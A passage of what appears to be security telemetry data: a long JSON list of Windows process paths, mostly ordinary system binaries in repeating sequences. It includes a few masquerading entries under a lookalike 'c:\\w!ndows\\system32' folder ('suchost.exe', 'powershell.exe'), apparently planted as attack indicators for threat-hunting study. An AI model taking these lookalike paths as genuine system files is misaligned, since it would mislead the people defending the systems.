agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c: